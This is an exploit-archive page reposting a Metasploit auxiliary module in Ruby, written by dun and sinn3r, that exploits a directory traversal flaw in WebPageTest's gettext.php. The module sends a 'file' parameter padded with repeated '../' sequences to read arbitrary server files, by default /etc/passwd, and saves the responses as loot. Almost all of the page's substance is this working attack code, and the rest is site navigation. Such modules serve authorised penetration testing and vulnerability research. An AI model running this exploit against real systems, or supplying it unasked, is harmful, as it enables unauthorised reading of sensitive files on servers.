WebPageTest Directory Traversal

WebPageTest Directory Traversal: Posted Sep 1, 2024; Authored by dun, sinn3r | Site metasploit.com; This Metasploit module exploits a directory traversal vulnerability found in WebPageTest. Due to the way the gettext.php script handles the file parameter, it is possible to read a file outside the www directory.; tags | exploit, php; SHA-256 | c8fc5793bb9641b12b4d2106a06fb4d479a668d64206809ae721e664f0532142; Download | Favorite | View

WebPageTest Directory Traversal

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WebPageTest Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability found in WebPageTest.
        Due to the way the gettext.php script handles the 'file' parameter, it is possible
        to read a file outside the www directory.
      },
      'References'     =>
        [
          ['EDB', '19790'],
          ['OSVDB', '83817']
        ],
      'Author'         =>
        [
          'dun',    # Discovery, PoC
          'sinn3r'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2012-07-13'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/']),
        OptString.new('FILE', [ true,  "The path to the file to view", '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'The max traversal depth', 11])
      ])
  end


  def run_host(ip)
    file     = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "/#{datastore['FILE']}"
    traverse = "../" * datastore['DEPTH']
    uri      = normalize_uri(target_uri.path)
    base     = File.dirname("#{uri}/.")

    print_status("Requesting: #{file} - #{rhost}")
    res = send_request_cgi({
      'uri'      => "#{base}/gettext.php",
      'vars_get' => { 'file' => "#{traverse}#{file}" }
    })

    if not res
      print_error("No response from server.")
      return
    end


    if res.code != 200
      print_error("Server returned a non-200 response (body will not be saved):")
      print_line(res.to_s)
      return
    end

    vprint_line(res.body)
    p = store_loot('webpagetest.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
    print_good("File saved as: #{p}")
  end
end

Top Authors In Last 30 Days

Red Hat 247 files
Jay Turla 150 files
indoushka 139 files
Ubuntu 61 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

WebPageTest Directory Traversal

WebPageTest Directory Traversal

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WebPageTest Directory Traversal

Share This

WebPageTest Directory Traversal

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems